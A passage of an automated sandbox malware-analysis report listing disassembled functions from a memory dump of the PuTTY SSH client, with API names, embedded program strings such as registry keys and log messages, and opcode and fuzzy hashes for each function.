                                                          • Instruction Fuzzy Hash: 6841B363B0E543A2FA10FB25D85157AE320EF85B80FC04131DA0D47B99EE7EE501E729
                                                          Function 00007FF738A51E30 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$DialogEnableItemText$ActiveExecuteParamShell
                                                          • String ID: %s%s%s%s$About %s$Release 0.82$https://www.chiark.greenend.org.uk/~sgtatham/putty/$open
                                                          • API String ID: 2657381607-1769109111
                                                          • Opcode ID: 5af1c287d6d2a9ed138b76be021ae021362be9dd0e30a429d3d204598e0d91e1
                                                          • Instruction ID: f1f59b576c6d5e3c8e050e78c4d859c18111e3bb5bbbea11703ef7421aca240a
                                                          • Opcode Fuzzy Hash: 5af1c287d6d2a9ed138b76be021ae021362be9dd0e30a429d3d204598e0d91e1
                                                          • Instruction Fuzzy Hash: A531B562A0D50361FA10B711E9507B9D352AF95BC0FC44232D84D07B95CFBEA58AA32A
                                                          Function 00007FF738AAA000 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 161synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Mutex$CloseFreeHandleLocalNameReleaseUser$AddressCreateErrorLastObjectProcSingleWait
                                                          • String ID: %s.%s.%s$%s: %s$*logtext || *ds_err || *us_err$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/sharing.c$Local\putty-connshare-mutex$Unable to call CryptProtectMemory: %s$\\.\pipe\putty-connshare
                                                          • API String ID: 3466441327-406684710
                                                          • Opcode ID: 5a95877971b273ffd7187492b880c2bfc991d4bba8718ff1eecef9002ef75740
                                                          • Instruction ID: ce1ede542611c532c016c9bd75001717c38e301b6c90aa2720180a238f9b30b2
                                                          • Opcode Fuzzy Hash: 5a95877971b273ffd7187492b880c2bfc991d4bba8718ff1eecef9002ef75740
                                                          • Instruction Fuzzy Hash: 85518517A0AA4761EA10BB12E450BBDE391AF45FC0FC45031DD4E0BB96DE3EE445E368
                                                          Function 00007FF738A5B350 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: LocalTimewcsftime
                                                          • String ID: %Y.%m.%d %H:%M:%S$%s session log (%s mode) to file: %s$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/logging.c$=~=~=~=~=~=~=~=~=~=~=~= PuTTY log %s =~=~=~=~=~=~=~=~=~=~=~=$Appending$Disabled writing$Error writing$SSH raw data$Writing new$ctx->state != L_OPENING$unknown
                                                          • API String ID: 2400502282-1125467219
                                                          • Opcode ID: 9269ccc74ebb1c8e678fae54bc3e7d6078ad09e8a39f6164a47cf0f238432595
                                                          • Instruction ID: 50a797a36526fe662810564bb3d7de97afbb1f28d7e05f1126e20e5c8375de40
                                                          • Opcode Fuzzy Hash: 9269ccc74ebb1c8e678fae54bc3e7d6078ad09e8a39f6164a47cf0f238432595
                                                          • Instruction Fuzzy Hash: 9D51C1A3A09616A1FA10EB15E455AB9E3A1EF84B80FC58031DE0D47795DF3EE146E328
                                                          Function 00007FF738A38750 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 182windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CountTick$Beep$CursorMessageShow
                                                          • String ID: $%s Sound Error$Unable to play sound file%sUsing default sound instead
                                                          • API String ID: 742117425-2085220474
                                                          • Opcode ID: 39254f9aca2b6e028cd50528829a8f5513aee018fcb98b51cc09e11dc1d55d77
                                                          • Instruction ID: 6850d01989104d4b37cbbf74d075ad476850966f354ddc320fe32e87ee67ffdf
                                                          • Opcode Fuzzy Hash: 39254f9aca2b6e028cd50528829a8f5513aee018fcb98b51cc09e11dc1d55d77
                                                          • Instruction Fuzzy Hash: 1681E573A09642A6FB20BB25E49077AE391EB84784F840135CA4E477D4CF7FE446E728
                                                          Function 00007FF738A6AB60 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 147networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: htonl$ErrorLastgetaddrinfogethostbynameinet_addr
                                                          • String ID: Host does not exist$Host not found$Network is down
                                                          • API String ID: 106626933-2906891963
                                                          • Opcode ID: 8f778696abc06392466938651ae1f1768ac878082443880210aeec345fc6d880
                                                          • Instruction ID: 8beeb347dc984f822f5b94f45134d30d30141e19150e73ad3fc4c642a2f708b8
                                                          • Opcode Fuzzy Hash: 8f778696abc06392466938651ae1f1768ac878082443880210aeec345fc6d880
                                                          • Instruction Fuzzy Hash: FB51B023B0A6029BEB64AF15E444779F3A0EB84790F940234DA5E477D5DF7EF480A728
                                                          Function 00007FF738A694F0 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 102registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                            • Part of subcall function 00007FF738A730C0: RegSetValueExA.ADVAPI32 ref: 00007FF738A730F3
                                                            • Part of subcall function 00007FF738A72F70: RegSetValueExA.ADVAPI32(?,?,?,?,?,?,00000000,00007FF738A695ED), ref: 00007FF738A72FA4
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF738A5F0A1), ref: 00007FF738A69618
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CloseValue$Create
                                                          • String ID: CA record must have a name$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Unable to create registry keyHKEY_CURRENT_USER\%s\%s$Validity
                                                          • API String ID: 1669778273-1463427279
                                                          • Opcode ID: b92953e2917b53d9d162efd728f3622e3663f71527166dd0dfd57f2a57b9d5f2
                                                          • Instruction ID: c3d61884ccb9892db681bd30664ddd6febb6b9bdff52411f7590692d12d90002
                                                          • Opcode Fuzzy Hash: b92953e2917b53d9d162efd728f3622e3663f71527166dd0dfd57f2a57b9d5f2
                                                          • Instruction Fuzzy Hash: 0541A953A0D64361EA10BB21E4516BAE761DF89BC4FC85031EE4E0B797DE7EE041E364
                                                          Function 00007FF738A5FCA0 Relevance: 15.1, APIs: 10, Instructions: 84threadtimeclipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessStatusThreadTimes$CaptureClipboardCursorForegroundGlobalMemoryOwnerQueueWindow
                                                          • String ID:
                                                          • API String ID: 3596705544-0
                                                          • Opcode ID: 2564a1033bc8bc41ffc2f6e20d9efb260bdaddb95d4a35852dbbb289587aafd7
                                                          • Instruction ID: 0e3d2f0ba141859f7d5cd0a82472108b74801756862df896dbeb99048566a7a3
                                                          • Opcode Fuzzy Hash: 2564a1033bc8bc41ffc2f6e20d9efb260bdaddb95d4a35852dbbb289587aafd7
                                                          • Instruction Fuzzy Hash: 083105A2719A1293F7507721E80476AEB51FB86FC0F804235DE8D07B95CE3ED54ACB25
                                                          Function 00007FF738A5A7D0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CreateFileInstanceModuleName_invalid_parameter_noinfo
                                                          • String ID: %.*s%s$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/jump-list.c$Connect to PuTTY session '$Pageant.exe$Run %.*s$appname
                                                          • API String ID: 3863850918-4154552165
                                                          • Opcode ID: 65685cc33e55da6d853b3c63a712f9ab3446f90253f2d2c33bd2c5e27b31b944
                                                          • Instruction ID: aba350cba2f8bbd2104a9bd38412c0c08b711ebfcc66c1c4aaa5a0d3c119053a
                                                          • Opcode Fuzzy Hash: 65685cc33e55da6d853b3c63a712f9ab3446f90253f2d2c33bd2c5e27b31b944
                                                          • Instruction Fuzzy Hash: 3E819C63B0AA53A1EE00BB15A451AB9E351AF84BC0FD44132DD4E03795EF3EF549E329
                                                          Function 00007FF738AFA168 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 149COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ConsoleFileHandleTypeWriteswprintf
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/utils/memory.c$Assertion failed: %Ts, file %Ts, line %d$Microsoft Visual C++ Runtime Library$extralen <= maxsize - oldlen
                                                          • API String ID: 2943507729-2836233655
                                                          • Opcode ID: ae8425285e3845fbfd9d284f5840513654f2d60b3ff7e810d40f2b24970bf344
                                                          • Instruction ID: 6dfe2eff1871eaab7693f180de0491bc2afff29358c05d98f47fe29c6da76694
                                                          • Opcode Fuzzy Hash: ae8425285e3845fbfd9d284f5840513654f2d60b3ff7e810d40f2b24970bf344
                                                          • Instruction Fuzzy Hash: AB51F763A1A64261E610BB11E851AFAF350FF84B94F900236E75D43BD6DF3EE405D718
                                                          Function 00007FF738A692D0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 128registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                            • Part of subcall function 00007FF738A72FD0: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000001,00007FFE21E98EC0,00007FF738A69836), ref: 00007FF738A7300D
                                                            • Part of subcall function 00007FF738A72FD0: RegQueryValueExA.ADVAPI32 ref: 00007FF738A73054
                                                          • RegCloseKey.ADVAPI32(?), ref: 00007FF738A694BF
                                                            • Part of subcall function 00007FF738A73110: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000000,00000000,?,00007FF738A69B73), ref: 00007FF738A7314B
                                                            • Part of subcall function 00007FF738A73110: RegQueryValueExA.ADVAPI32 ref: 00007FF738A73190
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$Close$Create
                                                          • String ID: MatchHosts$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Validity
                                                          • API String ID: 3505349609-2091482613
                                                          • Opcode ID: 75da368ed33617d33bf7cbf04cccdaa9e8fbc250c85b9e3787e2f88211c79c96
                                                          • Instruction ID: 92d88bf588f0ddf94b20c1126bdd67f788a79df80b5ec205457bffefe1c838b8
                                                          • Opcode Fuzzy Hash: 75da368ed33617d33bf7cbf04cccdaa9e8fbc250c85b9e3787e2f88211c79c96
                                                          • Instruction Fuzzy Hash: 74517223A0E64361EE10FB51A4547BAE391EF85780F844035EA8D07B8ADF7ED005E764
                                                          Function 00007FF738B01618 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,00000000,?,00007FF738B011D0,?,?,00000000,00007FF738B050F0,?,?,00000003,00007FF738AF6BBD), ref: 00007FF738B01797
                                                          • GetProcAddress.KERNEL32(?,00000000,?,00007FF738B011D0,?,?,00000000,00007FF738B050F0,?,?,00000003,00007FF738AF6BBD), ref: 00007FF738B017A3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: MZx$api-ms-$ext-ms-
                                                          • API String ID: 3013587201-2431898299
                                                          • Opcode ID: d3d81abfd44c62585150411d7845f13aebda893b270ed426dc2169cc7c153e4c
                                                          • Instruction ID: c260b3d16d9e70c5e75d343fe9e5ea0ad9af9ab7226e4d85cd75fe349caf22f3
                                                          • Opcode Fuzzy Hash: d3d81abfd44c62585150411d7845f13aebda893b270ed426dc2169cc7c153e4c
                                                          • Instruction Fuzzy Hash: 184158E3B09603A1FA15BB16D804975E791BF05BD0F884235DD2D47794DF3EE405A32A
                                                          Function 00007FF738A588F0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemText
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$Font: %s, %s%d-%s$Font: %s, %sdefault height$bold, $c && c->ctrl->type == CTRL_FONTSELECT$pixel$point
                                                          • API String ID: 3367045223-2475518631
                                                          • Opcode ID: c3455cc5c028e9244a0aac97f0ef575391ccfc5d2fa450468cf2793a9b67d778
                                                          • Instruction ID: eb99216f3beb3755fb5ee93bdc33d1ad5010af8118e3413f5e8c925cc4ef9928
                                                          • Opcode Fuzzy Hash: c3455cc5c028e9244a0aac97f0ef575391ccfc5d2fa450468cf2793a9b67d778
                                                          • Instruction Fuzzy Hash: A331D663A0AA47A0EA10FB11E885AB9E3A0AF44BD4FC54131DD4D57755DE3EE484E328
                                                          Function 00007FF738B14304 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                          • String ID:
                                                          • API String ID: 1330151763-0
                                                          • Opcode ID: 3c798ed775976f38655cf588123b4b726838ba7872b284b3f18423ba7cd36501
                                                          • Instruction ID: 55a4850bf1b52b652504f60f6538467cf0f1ae46f21572caea515e2d4a7e5375
                                                          • Opcode Fuzzy Hash: 3c798ed775976f38655cf588123b4b726838ba7872b284b3f18423ba7cd36501
                                                          • Instruction Fuzzy Hash: 20C10133B28A4296EB10DF64C4906ACB762F749B98B800335DE2E9B3D4CF39E551D315
                                                          Function 00007FF738A54A90 Relevance: 13.7, APIs: 9, Instructions: 190windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$DialogExtentMessageModePointRectReleaseSendText
                                                          • String ID:
                                                          • API String ID: 2675881590-0
                                                          • Opcode ID: ae405cb676f9f078d210b7e0febeff7eca22efe9e191549535ece83b230609e1
